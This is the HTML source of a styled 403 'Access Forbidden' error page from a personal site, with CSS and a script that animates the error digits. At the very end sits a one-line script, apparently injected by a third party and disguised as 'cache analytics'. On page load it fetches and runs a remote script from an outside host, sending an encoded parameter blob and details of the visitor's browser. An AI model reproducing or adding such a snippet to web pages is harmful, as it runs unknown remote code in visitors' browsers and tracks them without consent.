<html lang="en">

<head>

    <meta charset="UTF-8">
    <link rel="icon" href="https://coming.adityacprtm.com/images/icon.png">
    <link rel="mask-icon" type="" href="https://static.codepen.io/assets/favicon/logo-pin-f2d2b6d2c61838f7e76325261b7195c27224080bc099486ddd6dccb469b8e8e6.svg" color="#111">
    <title>Aditya Chamim Pratama</title>

    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">

    <style>
        * {
            font-family: 'PT Sans Caption', sans-serif, 'arial', 'Times New Roman';
        }
        /* Error Page */
        
        .error .clip .shadow {
            height: 180px;
            /*Contrall*/
        }
        
        .error .clip:nth-of-type(2) .shadow {
            width: 130px;
            /*Contrall play with javascript*/
        }
        
        .error .clip:nth-of-type(1) .shadow,
        .error .clip:nth-of-type(3) .shadow {
            width: 250px;
            /*Contrall*/
        }
        
        .error .digit {
            width: 150px;
            /*Contrall*/
            height: 150px;
            /*Contrall*/
            line-height: 150px;
            /*Contrall*/
            font-size: 120px;
            font-weight: bold;
        }
        
        .error h2
        /*Contrall*/
        
        {
            font-size: 32px;
        }
        
        .error .msg
        /*Contrall*/
        
        {
            top: -190px;
            left: 30%;
            width: 80px;
            height: 80px;
            line-height: 80px;
            font-size: 32px;
        }
        
        .error span.triangle
        /*Contrall*/
        
        {
            top: 70%;
            right: 0%;
            border-left: 20px solid #535353;
            border-top: 15px solid transparent;
            border-bottom: 15px solid transparent;
        }
        
        .error .container-error-404 {
            margin-top: 10%;
            position: relative;
            height: 250px;
            padding-top: 40px;
        }
        
        .error .container-error-404 .clip {
            display: inline-block;
            transform: skew(-45deg);
        }
        
        .error .clip .shadow {
            overflow: hidden;
        }
        
        .error .clip:nth-of-type(2) .shadow {
            overflow: hidden;
            position: relative;
            box-shadow: inset 20px 0px 20px -15px rgba(150, 150, 150, 0.8), 20px 0px 20px -15px rgba(150, 150, 150, 0.8);
        }
        
        .error .clip:nth-of-type(3) .shadow:after,
        .error .clip:nth-of-type(1) .shadow:after {
            content: "";
            position: absolute;
            right: -8px;
            bottom: 0px;
            z-index: 9999;
            height: 100%;
            width: 10px;
            background: linear-gradient(90deg, transparent, rgba(173, 173, 173, 0.8), transparent);
            border-radius: 50%;
        }
        
        .error .clip:nth-of-type(3) .shadow:after {
            left: -8px;
        }
        
        .error .digit {
            position: relative;
            top: 8%;
            color: white;
            background: #07B3F9;
            border-radius: 50%;
            display: inline-block;
            transform: skew(45deg);
        }
        
        .error .clip:nth-of-type(2) .digit {
            left: -10%;
        }
        
        .error .clip:nth-of-type(1) .digit {
            right: -20%;
        }
        
        .error .clip:nth-of-type(3) .digit {
            left: -20%;
        }
        
        .error h2 {
            color: #A2A2A2;
            font-weight: bold;
            padding-bottom: 20px;
        }
        
        .error .msg {
            position: relative;
            z-index: 9999;
            display: block;
            background: #535353;
            color: #A2A2A2;
            border-radius: 50%;
            font-style: italic;
        }
        
        .error .triangle {
            position: absolute;
            z-index: 999;
            transform: rotate(45deg);
            content: "";
            width: 0;
            height: 0;
        }
        /* Error Page */

        .buttonBack {
            display: inline-block;
            border-radius: 4px;
            background-color: #07B3F9;
            border: none;
            color: #FFFFFF;
            text-align: center;
            font-size: 18px;
            padding: 5px;
            width: 200px;
            transition: all 0.5s;
            cursor: pointer;
            margin: 5px;
        }

        .buttonBack span {
            cursor: pointer;
            display: inline-block;
            position: relative;
            transition: 0.5s;
        }

        .buttonBack span:after {
            content: '\00ab';
            position: absolute;
            opacity: 0;
            top: 0;
            left: -20px;
            transition: 0.5s;
        }

        .buttonBack:hover span {
            padding-left: 25px;
        }

        .buttonBack:hover span:after {
            opacity: 1;
            left: 0;
        }

        @media(max-width: 767px) {
            /* Error Page */
            .error .clip .shadow {
                height: 100px;
                /*Contrall*/
            }
            .error .clip:nth-of-type(2) .shadow {
                width: 80px;
                /*Contrall play with javascript*/
            }
            .error .clip:nth-of-type(1) .shadow,
            .error .clip:nth-of-type(3) .shadow {
                width: 100px;
                /*Contrall*/
            }
            .error .digit {
                width: 80px;
                /*Contrall*/
                height: 80px;
                /*Contrall*/
                line-height: 80px;
                /*Contrall*/
                font-size: 52px;
            }
            .error h2/*Contrall*/
            {
                font-size: 24px;
            }
            .error .msg/*Contrall*/
            {
                top: -110px;
                left: 15%;
                width: 40px;
                height: 40px;
                line-height: 40px;
                font-size: 18px;
            }
            .error span.triangle/*Contrall*/
            {
                top: 70%;
                right: -3%;
                border-left: 10px solid #535353;
                border-top: 8px solid transparent;
                border-bottom: 8px solid transparent;
            }
            .error .container-error-404 {
                height: 150px;
            }
            /* Error Page */
        }
        /*--------------------------------------------Framework --------------------------------*/
        
        .overlay {
            position: relative;
            z-index: 20;
        }
        /*done*/
        
        .ground-color {
            background: white;
        }
        /*done*/
        
        .item-bg-color {
            background: #EAEAEA
        }
        /*done*/
        /* Padding Section*/
        
        .padding-top {
            padding-top: 10px;
        }
        /*done*/
        
        .padding-bottom {
            padding-bottom: 10px;
        }
        /*done*/
        
        .padding-vertical {
            padding-top: 10px;
            padding-bottom: 10px;
        }
        
        .padding-horizontal {
            padding-left: 10px;
            padding-right: 10px;
        }
        
        .padding-all {
            padding: 10px;
        }
        /*done*/
        
        .no-padding-left {
            padding-left: 0px;
        }
        /*done*/
        
        .no-padding-right {
            padding-right: 0px;
        }
        /*done*/
        
        .no-vertical-padding {
            padding-top: 0px;
            padding-bottom: 0px;
        }
        
        .no-horizontal-padding {
            padding-left: 0px;
            padding-right: 0px;
        }
        
        .no-padding {
            padding: 0px;
        }
        /*done*/
        /* Padding Section*/
        /* Margin section */
        
        .margin-top {
            margin-top: 10px;
        }
        /*done*/
        
        .margin-bottom {
            margin-bottom: 10px;
        }
        /*done*/
        
        .margin-right {
            margin-right: 10px;
        }
        /*done*/
        
        .margin-left {
            margin-left: 10px;
        }
        /*done*/
        
        .margin-horizontal {
            margin-left: 10px;
            margin-right: 10px;
        }
        /*done*/
        
        .margin-vertical {
            margin-top: 10px;
            margin-bottom: 10px;
        }
        /*done*/
        
        .margin-all {
            margin: 10px;
        }
        /*done*/
        
        .no-margin {
            margin: 0px;
        }
        /*done*/
        
        .no-vertical-margin {
            margin-top: 0px;
            margin-bottom: 0px;
        }
        
        .no-horizontal-margin {
            margin-left: 0px;
            margin-right: 0px;
        }
        
        .inside-col-shrink {
            margin: 0px 20px;
        }
        /*done - For the inside sections that has also Title section*/
        /* Margin section */
        
        hr {
            margin: 0px;
            padding: 0px;
            border-top: 1px dashed #999;
        }
        /*--------------------------------------------FrameWork------------------------*/
    </style>

    <script>
        window.console = window.console || function(t) {};
    </script>

    <script>
        if (document.location.search.match(/type=embed/gi)) {
            window.parent.postMessage("resize", "*");
        }
    </script>

</head>

<body translate="no" style="">

    <link href="https://fonts.googleapis.com/css?family=Anton|Passion+One|PT+Sans+Caption" rel="stylesheet" type="text/css">

    <!-- Error Page -->
    <div class="error">
        <div class="container-floud">
            <div class="col-xs-12 ground-color text-center">
                <div class="container-error-404">
                    <div class="clip">
                        <div class="shadow"><span class="digit thirdDigit">4</span></div>
                    </div>
                    <div class="clip">
                        <div class="shadow"><span class="digit secondDigit">0</span></div>
                    </div>
                    <div class="clip">
                        <div class="shadow"><span class="digit firstDigit">3</span></div>
                    </div>
                    <div class="msg">OH!<span class="triangle"></span></div>
                </div>
                <h2 class="h1">Sorry! Access Forbidden</h2>
                <button type="button" onclick="window.location.href='/site/'" class="buttonBack"><span>Home Page</span></button>
            </div>
        </div>
    </div>
    <!-- Error Page -->

    <script src="//static.codepen.io/assets/common/stopExecutionOnTimeout-41c52890748cd7143004e05d3c5f786c66b19939c4500ce446314d1748483e13.js"></script>

    <script>
        function randomNum() {
            "use strict";
            return Math.floor(Math.random() * 9) + 1;
        }
        var loop1, loop2, loop3, time = 30,
            i = 0,
            number, selector3 = document.querySelector('.thirdDigit'),
            selector2 = document.querySelector('.secondDigit'),
            selector1 = document.querySelector('.firstDigit');
        loop3 = setInterval(function() {
            "use strict";
            if (i > 40) {
                clearInterval(loop3);
                selector3.textContent = 4;
            } else {
                selector3.textContent = randomNum();
                i++;
            }
        }, time);
        loop2 = setInterval(function() {
            "use strict";
            if (i > 80) {
                clearInterval(loop2);
                selector2.textContent = 0;
            } else {
                selector2.textContent = randomNum();
                i++;
            }
        }, time);
        loop1 = setInterval(function() {
            "use strict";
            if (i > 100) {
                clearInterval(loop1);
                selector1.textContent = 3;
            } else {
                selector1.textContent = randomNum();
                i++;
            }
        }, time);
        //# sourceURL=pen.js
    </script>

    <script src="https://static.codepen.io/assets/editor/live/css_reload-2a5c7ad0fe826f66e054c6020c99c1e1c63210256b6ba07eb41d7a4cb0d0adab.js"></script>

<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd%2bpRZe5szg5vTNG2e%2bKRAuLoyy8gUgN7c9kWlW3dzTEkwYmpqfHE0h6%2boMRnKmE6bC0wDZEun9mMoTZmgIbVUndAzxjePDxqPox0M3F3jBkdA7z%2f6OUP4AB9LBLP%2fY1giJkHVtZvfkT4VuOJvbLuDcd8oq8cnjH2zaoUADAqXeq5Xe7deYS0iLE9cnM7zLfO74SnJnE9NYg8P2F9BFJY48ZWYJRwJDrAVOQyLmqitX4HsarCVWb9UA7MUdGjiu1r4BEu3ikVazSqddz3BzyrUNjUjLn6QU%2fIhOqb8nMFAKWXQFY4CEcIXg8rQZsVwfxxULrMUvLgZFx%2feMWOV2sXI3jLg5udFTfUnU68XKgKY7oH6%2bWmojgx5u1HMtpcbbdO4TDPL16gDfdLLZ71FJniwylAvItLZU4igRMK51KK3CYdPXYTi9r%2f3%2bFnNllVNa2bQ1wv3PRJUgwPpOUEsP1%2fye2HdUzoynPjKfO9DCYpnlzhhsAJ4QNRJwBCvk9Hq0TOMUpYQiNZFA9I63o5lVGXOBud8L3Sqlv92aXbYb8pDEayhOg0AVY5sn2iDuTMotKWcUk%2fgBWQL7mVmvj8jiJyc8064VhkG1Lm1CsDI15ojfksIEgQud2usjXfLbB0jA5iBFZGbiuANhYAMavQQTlMyZR0B30zbCUKKCyj%2fDRycInE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>